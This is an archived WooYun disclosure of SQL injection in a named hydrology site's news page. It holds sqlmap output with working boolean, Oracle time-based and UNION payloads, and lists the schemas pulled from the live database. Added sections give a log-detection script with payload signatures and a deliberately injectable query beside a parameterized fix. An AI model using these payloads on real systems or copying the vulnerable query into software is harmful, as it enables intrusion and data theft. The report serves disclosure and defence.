WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2015-04-24: Details reported to the vendor, awaiting vendor handling
2015-04-28: Vendor confirmed; details disclosed to the vendor only
2015-05-08: Details disclosed to core white hats and relevant domain experts
2015-05-18: Details disclosed to regular white hats
2015-05-28: Details disclosed to intern white hats
2015-06-12: Details disclosed to the public
As the title says..
url:http://www.gdhydro.com/
SQL injection:
http://www.gdhydro.com/MaritimeManage/portal/news/news_info.jsp?newsId=2149
[12:07:51] [INFO] testing 'Oracle AND time-based blind'
[12:08:22] [INFO] GET parameter 'newsId' seems to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[12:08:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:08:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:08:27] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:08:30] [INFO] target URL appears to have 11 columns in query
[12:08:31] [INFO] GET parameter 'newsId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'newsId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Parameter: newsId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=2149 AND 3997=3997

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: newsId=2149 AND 8821=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(117)||CHR(120)||CHR(97),5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: newsId=2149 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(106)||CHR(106)||CHR(113)||CHR(88)||CHR(72)||CHR(117)||CHR(118)||CHR(106)||CHR(83)||CHR(104)||CHR(66)||CHR(78)||CHR(108)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL
---
[12:08:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:08:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:08:34] [INFO] fetching database (schema) names
[12:08:34] [INFO] the SQL query used returns 26 entries
[12:08:35] [INFO] retrieved: CTXSYS
[12:08:36] [INFO] retrieved: DBSNMP
[12:08:36] [INFO] retrieved: DMSYS
[12:08:37] [INFO] retrieved: EXFSYS
[12:08:38] [INFO] retrieved: GDHPD
[12:08:38] [INFO] retrieved: GDHPDWEB
[12:08:39] [INFO] retrieved: HR
[12:08:40] [INFO] retrieved: IX
[12:08:40] [INFO] retrieved: MARITIME
[12:08:41] [INFO] retrieved: MDSYS
[12:08:42] [INFO] retrieved: NTM
[12:08:42] [INFO] retrieved: NTM_EN
[12:08:43] [INFO] retrieved: OE
[12:08:43] [INFO] retrieved: OLAPSYS
[12:08:44] [INFO] retrieved: ORDSYS
[12:08:45] [INFO] retrieved: OUTLN
[12:08:45] [INFO] retrieved: PM
[12:08:46] [INFO] retrieved: SCGRID
[12:08:47] [INFO] retrieved: SCOTT
[12:08:47] [INFO] retrieved: SH
[12:08:49] [INFO] retrieved: SYS
[12:08:50] [INFO] retrieved: SYSMAN
[12:08:50] [INFO] retrieved: SYSTEM
[12:08:51] [INFO] retrieved: TSMSYS
[12:08:52] [INFO] retrieved: WMSYS
[12:08:53] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
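The sqlmap session above leaves a clear trail in the web server's access log: a parameter that should only ever carry an integer suddenly carries `AND 3997=3997`, `DBMS_PIPE.RECEIVE_MESSAGE(...)` and `UNION ALL SELECT NULL,...`. The following added example (not part of the report, and not the site's own tooling) shows detection logic for exactly those three payload shapes run over a handful of constructed combined-format log lines. The log lines, the client IP and the assumption that `newsId` is the only integer-typed parameter are all made up for the example; the path and parameter name come from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the report). The query
# strings mirror the three payload shapes sqlmap listed for 'newsId':
# boolean-based blind, Oracle time-based blind, and UNION query.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Apr/2015:12:07:51 +0800] "GET /MaritimeManage/portal/news/news_info.jsp?newsId=2149 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Apr/2015:12:08:22 +0800] "GET /MaritimeManage/portal/news/news_info.jsp?newsId=2149%20AND%203997%3D3997 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Apr/2015:12:08:23 +0800] "GET /MaritimeManage/portal/news/news_info.jsp?newsId=2149%20AND%208821%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2870%29%7C%7CCHR%28117%29%2C5%29 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Apr/2015:12:08:31 +0800] "GET /MaritimeManage/portal/news/news_info.jsp?newsId=2149%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%2898%29%2CNULL%2CNULL%20FROM%20DUAL HTTP/1.1" 200 7340
10.0.0.5 - - [24/Apr/2015:12:09:02 +0800] "GET /MaritimeManage/portal/news/news_info.jsp?newsId=2150 HTTP/1.1" 200 4980
"""

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures for the three techniques visible in the sqlmap output. Order only
# decides which label is listed first in a finding.
SIGNATURES = [
    ("oracle time-based blind", re.compile(r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE", re.I)),
    ("union query", re.compile(r"\bUNION\b\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\b\s+\d+\s*=\s*\d+", re.I)),
]

# Parameters the application treats as integer IDs (assumption: newsId only).
INTEGER_PARAMS = {"newsId"}


def classify_value(param, value):
    """Return the technique labels matched by one decoded parameter value."""
    labels = [name for name, rx in SIGNATURES if rx.search(value)]
    # Type anomaly: an integer parameter carrying anything but digits is
    # suspicious even when no known signature fires.
    if param in INTEGER_PARAMS and not value.isdigit():
        labels.append("non-integer value for integer parameter")
    return labels


def scan_log(log_text):
    """Scan combined-format log text; return one finding per suspicious parameter value."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs splits on '&' and '=' before percent-decoding, so an encoded
        # '=' (%3D) inside a payload stays part of the value.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                labels = classify_value(param, value)
                if labels:
                    findings.append(
                        {"line": lineno, "param": param, "value": value, "techniques": labels}
                    )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['techniques'])}")
```

The type check is the part worth keeping even if the signature list goes stale: sqlmap varies its payload text, but it cannot make `newsId=2149 AND ...` look like a bare integer, so an allow-list on the expected type catches the whole family of probes against this parameter.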
Login page:
http://www.gdhydro.com/login.html
Filter the input.
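The fix line says only "filter". The following added example (not from the report and not the site's code; the table, its two rows and the use of sqlite3 as a stand-in for the JSP/Oracle stack on the page are all constructed for illustration) shows what that means in practice for a parameter like `newsId`: the vulnerable form splices the raw request value into the SQL text, so the report's `AND 3997=3997` and `UNION ALL SELECT NULL,...` payloads change the query; the hardened form allow-lists the value as a decimal integer and then binds it as a typed parameter, so the same inputs are rejected before any SQL is built.

```python
import sqlite3


def make_db():
    """Throwaway in-memory table standing in for the real news table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (newsId INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)", [(2149, "Notice A"), (2150, "Notice B")]
    )
    return conn


def news_info_vulnerable(conn, news_id):
    """The anti-pattern: the raw request parameter becomes part of the SQL text."""
    sql = "SELECT newsId, title FROM news WHERE newsId = " + news_id
    return conn.execute(sql).fetchall()


def is_valid_news_id(news_id):
    """Allow-list check: the parameter must be a plain decimal integer of sane length."""
    return news_id.isdigit() and len(news_id) <= 10


def news_info_safe(conn, news_id):
    """Validate first, then bind the value as a typed parameter, never as SQL text."""
    if not is_valid_news_id(news_id):
        raise ValueError("newsId must be a decimal integer")
    return conn.execute(
        "SELECT newsId, title FROM news WHERE newsId = ?", (int(news_id),)
    ).fetchall()


def compare(news_id):
    """Run both versions on one input and report what each returns (or why it refused)."""
    conn = make_db()
    vulnerable = news_info_vulnerable(conn, news_id)
    try:
        safe = news_info_safe(conn, news_id)
    except ValueError as exc:
        safe = f"rejected: {exc}"
    return {"input": news_id, "vulnerable": vulnerable, "safe": safe}


if __name__ == "__main__":
    # The last three inputs mirror the payload shapes in the sqlmap output above.
    for payload in (
        "2149",
        "2149 AND 3997=3997",
        "2149 AND 3997=3998",
        "2149 UNION ALL SELECT NULL,NULL",
    ):
        print(compare(payload))
```

On the page's own stack the same two steps are a digits-only check on the request parameter followed by a JDBC `PreparedStatement` with `setInt`; the point carried over from the sqlite3 stand-in is that the bound value can only ever be compared as a number, so the boolean, time-based and UNION variants all lose their effect.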
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-04-28 10:24
Forwarded by CNCERT to the relevant branch center, which will coordinate handling with the website's operator.
None yet